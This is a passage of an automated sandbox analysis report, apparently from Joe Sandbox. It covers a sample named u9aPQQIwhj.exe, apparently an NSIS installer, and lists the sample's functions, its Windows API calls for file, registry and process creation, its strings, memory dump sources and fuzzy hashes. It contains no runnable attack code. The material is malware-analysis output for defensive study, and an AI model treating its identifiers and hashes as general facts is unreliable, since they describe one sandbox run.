GlobalFree.KERNEL32(?), ref: 10001DA9
GlobalFree.KERNEL32(?), ref: 10001DAE
GlobalFree.KERNEL32(?), ref: 10001DB3
GlobalFree.KERNEL32(00000000), ref: 10001F57
lstrcpyW.KERNEL32(?,?), ref: 100020BB

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll
API String ID: 2531174081-1401546287
Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,00410B11,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(00006EF9,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Strings

C:\Users\user\AppData\Local\Temp\nsh4048.tmp, xrefs: 0040237E, 004023A3, 004023B3, 004023BE

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsh4048.tmp
API String ID: 1356686001-414440043
Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Uploadable\normallnnens\Trskelen,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\Uploadable\normallnnens\Trskelen
API String ID: 3751793516-936114887
Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3

GlobalFree.KERNEL32(00000000), ref: 1000181C
FreeLibrary.KERNEL32(?), ref: 10001893
GlobalFree.KERNEL32(00000000), ref: 100018B8

Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3

Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686

Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5

Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B

Strings

, xrefs: 10001899

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpywsprintf
String ID:
API String ID: 1767494692-3916222277
Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23

Strings

Call, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C
nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00403345

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B
1033, xrefs: 0040334C

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
